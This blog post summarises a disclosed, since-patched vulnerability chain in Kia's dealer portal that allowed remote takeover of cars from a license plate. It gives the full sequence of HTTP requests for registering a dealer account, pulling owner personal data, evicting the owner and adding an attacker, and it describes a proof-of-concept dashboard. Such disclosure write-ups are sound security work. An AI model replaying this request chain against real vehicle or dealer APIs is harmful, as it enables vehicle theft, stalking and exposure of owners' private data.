How You Can Hack and Take Over a Car in 30 Seconds: Lessons from Sam Curry’s Research

In June 2024, Sam Curry uncovered a series of significant security vulnerabilities in Kia vehicles, which enabled attackers to remotely control essential vehicle functions using just a license plate number. These vulnerabilities were so severe that they could be exploited in under 30 seconds on any Kia vehicle equipped with the necessary hardware, regardless of whether the car had an active Kia Connect subscription.

Beyond gaining control of the vehicle, attackers could also quietly retrieve personal details such as the owner’s name, phone number, email, and physical address. This would allow them to add themselves as an unnoticed secondary user on the victim’s vehicle, all without the owner’s knowledge.

To demonstrate the potential risks of these vulnerabilities, Curry’s team developed a tool that allowed an attacker to input a Kia vehicle’s license plate and execute commands on the car in about 30 seconds. However, the tool was never made publicly available, and Kia has since patched these issues. The Kia team also verified that there had been no malicious exploitation of these vulnerabilities.

Discovering Vulnerabilities in Kia’s System

Two years prior, Sam Curry collaborated with other hackers to investigate vulnerabilities across a wide range of car manufacturers. In their efforts, they identified significant security flaws that could enable attackers to remotely access various vehicle functions, such as locating, disabling, unlocking, or even starting an estimated 15.5 million vehicles.

With so much time passing since that discovery, Curry’s team revisited several of the companies involved, starting with Kia, to see if new vulnerabilities had emerged.

Their initial examination focused on the owners.kia.com website and Kia’s Connect iOS app, com.myuvo.link. Both systems were of particular interest due to their ability to send commands to vehicles over the internet.

Despite the website and mobile app serving the same purpose, their internal mechanisms for processing commands were different. The website relied on a backend reverse-proxy to pass user commands to the api.owners.kia.com backend, which was responsible for executing the commands. On the other hand, the mobile app directly communicated with this API.

Below is a real example of an HTTP request that demonstrates how the owners.kia.com website would proxy a request to the api.owners.kia.com backend to unlock a vehicle’s door:

HTTP Request to Unlock Car Door on the “owners.kia.com” website

POST /apps/services/owners/apigwServlet.html HTTP/2
Host: owners.kia.com
Httpmethod: GET
Apiurl: /door/unlock
Servicetype: postLoginCustomer
Cookie: JSESSIONID=SESSION_TOKEN;

Once this request was made, the Kia backend generated a session ID that authenticated the user through the JSESSIONID. The request was then forwarded to the api.owners.kia.com backend in this format:

HTTP Request Formed and Proxied by Server

GET /apigw/v1/rems/door/unlock HTTP/1.1
Host: api.owners.kia.com
Sid: 454817d4-b228-4103-a26f-884e362e8dee
Vinkey: 3ecca1a9-aefd-4188-a7fe-1732e1663d6e

The critical headers in this request were the session token and the unique vehicle identifier (Vinkey). While additional headers were included, these two were key to gaining control over vehicle access. Both requests stemmed from the same areas that had exhibited vulnerabilities in Kia’s system back in 2023.

Since Curry’s team was already well-versed in the user-side mechanics, they then turned their attention to analyzing the Kia Dealer website.

Targeting the Kia Dealer Infrastructure

One area that Sam Curry and his team had not previously explored was how Kia handled vehicle activations for new purchases. After discussing with a few contacts, they discovered that Kia typically requested customers’ email addresses at the dealership to send a registration link. This link could be used to either create a new Kia account or add a newly purchased vehicle to an existing account.

Curry’s team asked the contacts if they could share the registration links they had received, and they were able to get the following page:

This was intriguing because the kiaconnect.kdealer.com domain was completely new to the team. Upon opening the link, they were presented with a sign-in page for a Kia Owners Account.

The token parameter in this URL, also known as the VIN Key, was an access token generated by Kia dealers. It was a one-time grant used to modify the vehicle associated with the VIN parameter in the URL. After loading this URL, the following HTTP request was sent to verify the token’s validity:

POST /apps/services/kdealer/apigwServlet.html HTTP/1.1
Host: kiaconnect.kdealer.com
{
    "token": "985a49f0-1fe5-4d36-860e-d9b93272072b",
    "vin": "5XYP3DHC9NG310533",
    "scenarioType": 3,
    "loginPref": null
}

The HTTP request sent to validate the one-time access token was very similar to the ones they had previously encountered on owners.kia.com. However, this request was directed to the Kia Connect dealer system, likely indicating that the dealer infrastructure used a similar reverse-proxy to handle API commands internally for dealership functionalities.

The team then delved deeper into the JavaScript code of the website, specifically looking for interesting API gateway calls. This search uncovered what appeared to be functionalities restricted to dealer employees, such as vehicle lookup, account management, and enrollment. Among these was a vehicle lookup function:

dealerVehicleLookUp() {
    this.displayLoader = !0, this.vinToEnroll = "eDelivery" != this.entryPoint ? this.vinToEnroll.replace(/\s/g, "") : this.userDetails.vin, "17" == this.vinToEnroll.length && this.landingPageService.postOffice({
        vin: this.vinToEnroll
    }, "/dec/dlr/dvl", "POST", "postLoginCustomer").subscribe(i => {
        i && (i.hasOwnProperty("body") && "0" == i.body.status.statusCode ? this.processDvlData(i.body) : "1003" == i.body.status.errorCode && "kia-dealer" == this.entryPoint ? this.reRouteSessionExpire() : (this.displayLoader = !1, this.alertMessage = i.body.status.errorMessage, document.getElementById("triggerGeneralAlertModal").click()))
    })
}

To test if these endpoints could be accessed, Curry’s team attempted an HTTP request to the dealer API endpoint with a dealer token (passed in the Appid header) and the VIN number of a vehicle they owned:

POST /apps/services/kdealer/apigwServlet.html HTTP/1.1
Host: kiaconnect.kdealer.com
Httpmethod: POST
Apiurl: /dec/dlr/dvl

{
    "vin": "1HGBH41JXMN109186"
}

Unfortunately, the server responded with a 401 Unauthorized error, indicating that the session key was either invalid or expired. It appeared that the dealer endpoints did not recognize the access token provided through email during the vehicle purchase process.

After sending the HTTP request with the dealer token, the server responded with a 401 Unauthorized error:

HTTP/1.1 401 Unauthorized
Content-type: application/json

{
  "status": {
    "statusCode": 1,
    "errorType": 1,
    "errorCode": 1003,
    "errorMessage": "Session Key is either invalid or expired"
  }
}

This response indicated that the dealer endpoints did not recognize the access token provided via email when purchasing a new vehicle, making the token unusable in this scenario.

Curry’s team then decided to revisit their approach. They speculated whether it might be possible to simply register as a dealer, generate an access token, and use that token with the dealer API. Since the kiaconnect.kdealer.com website followed the same API structure as the Kia Owners website, they attempted to create a dealer account using the same registration method:

POST /apps/services/kdealer/apigwServlet.html HTTP/1.1
Host: kiaconnect.kdealer.com
Httpmethod: POST
Apiurl: /prof/registerUser

{
  "userCredential": {
    "firstName": "Sam",
    "lastName": "Curry",
    "userId": "[email protected]",
    "password": "FakePass123!",
    "acceptedTerms": 1
  }
}

The registration was successful, returning a 200 OK status, which confirmed that they could create a new dealer account using the same HTTP request process as the Kia Owners website. They quickly logged in and generated a new access token:

POST /apps/services/kdealer/apigwServlet.html HTTP/1.1
Host: kiaconnect.kdealer.com
Httpmethod: POST
Apiurl: /prof/authUser

{
  "userCredential": {
    "userId": "[email protected]",
    "password": "FakePass123!"
  }
}

The login was successful, and the server returned an HTTP response with a session cookie:

HTTP/1.1 200 OK
Sid: 123e4567-e89b-12d3-a456-426614174000

Using this session token, Curry’s team sent their generated access token to the previously unauthorized dealer API gateway endpoint to search for a VIN:

POST /apps/services/kdealer/apigwServlet.html HTTP/1.1
Host: kiaconnect.kdealer.com
Appid: 123e4567-e89b-12d3-a456-426614174000
Apiurl: /dec/dlr/dvl

{
    "vin": "1HGBH41JXMN109186"
}

This time, the request was successful, and the server responded with a 200 OK status, returning sensitive vehicle and owner information:

HTTP/1.1 200 OK
Content-type: application/json

{
  "payload": {
    "billingSubscriptionSupported": 1,
    "digitalKeySupported": 0,
    "generation": "3",
    "profiles": [
      {
        "address": {},
        "billSubscriptionStatus": 1,
        "digitalKeyStatus": 0,
        "email": "[email protected]",
        "enrollmentReqStatus": 1,
        "enrollmentStatus": 1,
        "firstName": "yeet",
        "lastName": "yeet",
        "loginId": "[email protected]",
        "phone": "4027181388",
        "phoneType": 3,
        "wifiHotspotStatus": 0
      }
    ],
    "vinAddedToAccount": 1,
    "wifiHotspotSupported": 1
  }
}

By registering and authenticating as a dealer, Curry’s team was able to generate valid access tokens that allowed them to query the backend dealer APIs. These API calls provided sensitive details about the vehicle owner, including their email address, phone number, and other personal data. This successful authentication revealed that their method allowed access to several other dealer endpoints, exposing a wide range of information.

Gaining Control Over a Victim’s Vehicle

After studying the infrastructure for a few hours, Sam Curry and his team eventually understood how the enrollment, authentication, and modification processes worked. This knowledge allowed them to take over a victim’s vehicle. They identified four critical HTTP requests needed to achieve this:

Below is the step-by-step process used to take control of a victim’s vehicle:

1.Generate the Dealer Token and Retrieve the “Sid” Header from HTTP Responses

To begin, the team generated a dealer account, logged in, and received a valid session token (sid). The request to generate the session token was:

POST /apps/services/kdealer/apigwServlet.html HTTP/1.1
Host: kiaconnect.kdealer.com
Httpmethod: POST
Apiurl: /prof/authUser

{
  "userCredential": {
    "userId": "[email protected]",
    "password": "Fakepass123!"
  }
}

2.Fetch the Victim’s Email Address and Phone Number

With the valid session token, the team accessed dealer endpoints to retrieve the victim’s personal information, such as their email and phone number, by making the following request:

POST /apps/services/kdealer/apigwServlet.html HTTP/1.1
Host: kiaconnect.kdealer.com
Httpmethod: POST
Apiurl: /dec/dlr/dvl
Appid: 123e4567-e89b-12d3-a456-426614174000

{
  "vin": "VIN"
}

This response revealed the victim’s email and phone number, allowing the attacker to proceed with the next step.

3.Modify the Owner’s Profile to Deny Them Access

Once the victim’s information was retrieved, the next step was to remove the victim as the vehicle’s primary user. This was done through the following HTTP request, which dismissed the owner by using the phone number and email obtained in the previous step:

POST /apps/services/kdealer/apigwServlet.html HTTP/1.1
Host: kiaconnect.kdealer.com
Httpmethod: POST
Apiurl: /dec/dlr/rvp
Appid: 123e4567-e89b-12d3-a456-426614174000

{
  "vin": "VIN",      
  "loginId": "[email protected]", 
  "dealerCode": "eDelivery"           
}

4.Add Attacker to Victim Vehicle

The final step involved assigning the attacker’s email as the primary owner of the victim’s vehicle. This allowed the attacker to send arbitrary commands to the car and assume full control over its functions. The HTTP request used to perform this action was as follows:

POST /apps/services/kdealer/apigwServlet.html HTTP/1.1
Host: kiaconnect.kdealer.com
Httpmethod: POST
Apiurl: /ownr/dicve
Appid: 123e4567-e89b-12d3-a456-426614174000

{
  "vin": "5XYRK4LFXMG016215",
  "loginId": "[email protected]"
}

By completing this request, the attacker-controlled email was now set as the primary owner of the vehicle. This enabled the attacker to send commands to the car as if they were the legitimate owner.

These four HTTP requests — used to modify ownership and send commands — could be executed on nearly any Kia vehicle manufactured after 2013, with the only requirement being the license plate number of the vehicle.

From the victim’s perspective, there were no notifications or alerts indicating that their vehicle had been accessed or that their permissions had been altered. An attacker could resolve the license plate of a vehicle, enter the associated VIN through the API, and then track the vehicle’s location passively. Furthermore, the attacker could issue active commands, such as unlocking, starting, or honking the vehicle.

The seriousness of these vulnerabilities was immediately apparent to Sam Curry’s team, and they reported the findings to Kia. While Kia worked on a fix, the team created a proof-of-concept dashboard to demonstrate the impact of the vulnerability more effectively.

License Plate Takeover Proof of Concept

The goal of the proof of concept UI was straightforward: to build a dashboard where an attacker could input the license plate of a Kia vehicle, retrieve the owner’s personal information, and execute commands on the vehicle.

Since the attack involved adding the victim’s vehicle to an attacker-controlled account, Curry’s team structured the PoC to include two main pages: the Exploit page and the Garage page. The Exploit page was used to take over vehicles, while the Garage page allowed the attacker to issue commands and track the vehicles once they were compromised.

Here’s how the PoC functioned:

• License Plate to VIN: The PoC used a third-party API to convert the license plate number into the corresponding VIN (Vehicle Identification Number).
• Takeover Button: This button executed the four-step process required to take control of a vehicle, using the VIN retrieved from the license plate. The process involved generating a dealer token via the login form, retrieving the victim’s email and phone number, demoting the vehicle’s original owner to an account holder, and assigning the attacker as the primary account holder.
• Fetch Owner Button: This button passively retrieved the victim’s personal information, including their name, email address, and phone number.
• Garage Tab: Once a vehicle was compromised, the Garage tab allowed the attacker to list the vehicles under their control and issue commands like unlocking, starting, or locating the vehicles.

After developing this tool, the team recorded a proof-of-concept video using a locked rental Kia. In the video, they demonstrated how the attack worked by taking over the vehicle through their phone and then remotely locking/unlocking, starting/stopping, honking, and locating the vehicle. This video is included at the beginning of the blog post to showcase the attack.

Sam Curry and other hacker’s research exposed critical vulnerabilities in Kia’s infrastructure that allowed remote vehicle takeovers using just a license plate number. While Kia has since fixed these issues, this case highlights the importance of securing connected vehicles and the potential risks of API misconfigurations. It serves as a reminder of the need for thorough testing and responsible disclosure to keep modern automotive systems safe from exploitation.

Stay vigilant, stay informed, and stay secure!

Thank You for Reading!

Your interest and attention are greatly appreciated.

Resources:

Hacking Kia: Remotely Controlling Cars With Just a License Plate

How You Can Hack and Take Over a Car in 30 Seconds: Lessons from Sam Curry’s Research was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.